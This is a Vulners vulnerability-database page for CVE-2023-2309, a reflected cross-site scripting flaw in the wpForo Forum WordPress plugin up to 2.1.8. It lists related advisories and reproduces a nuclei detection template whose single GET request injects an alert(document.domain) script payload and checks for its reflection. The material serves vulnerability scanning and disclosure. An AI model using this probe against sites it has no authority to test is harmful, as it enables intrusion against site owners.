Lucene search
K

wpForo Forum <= 2.1.8 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

The wpForo Forum plugin for WordPress <= 2.1.8 is vulnerable to Reflected Cross-Site Scripting due to insufficient input sanitization and output escaping. Attackers can inject arbitrary web scripts and execute them by tricking users

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-2309
24 Jul 202314:25
circl
CNNVD
WordPress Plugin wpForo Forum 跨站脚本漏洞
24 Jul 202300:00
cnnvd
CVE
CVE-2023-2309
24 Jul 202310:20
cve
Cvelist
CVE-2023-2309 wpForo Forum < 2.1.9 - Reflected Cross-Site Scripting
24 Jul 202310:20
cvelist
EUVD
EUVD-2023-33814
3 Oct 202520:07
euvd
NVD
CVE-2023-2309
24 Jul 202311:15
nvd
OSV
CVE-2023-2309
24 Jul 202311:15
osv
Patchstack
WordPress wpForo Forum Plugin < 2.1.9 is vulnerable to Cross Site Scripting (XSS)
6 Jul 202300:00
patchstack
Prion
Cross site scripting
24 Jul 202311:15
prion
Positive Technologies
PT-2023-18841 · WordPress · Wpforo Forum
24 Jul 202300:00
ptsecurity
Rows per page
id: CVE-2023-2309

info:
  name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the wpforo_debug function to steal WordPress administrator session cookies when they view crafted links.
  remediation: Fixed in 2.1.9
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2309
    - https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2309
    epss-score: 0.00812
    epss-percentile: 0.52524
    cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gvectors
    product: wpforo_forum
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wpforo/"
  tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss,vuln

http:
  - raw:
      - |
        GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"<script>alert(/document.domain/)</script>","wpforo")'
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402204e6c82a9ad73dc8212f622c93569b203a13c3db69d6e09ff48588f3f208c7717022072b90e8acba69a96d5e8c9fc4470c0160f432096046ab6fb9c4f23d786e338d0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.16.1
EPSS0.00812
SSVC
46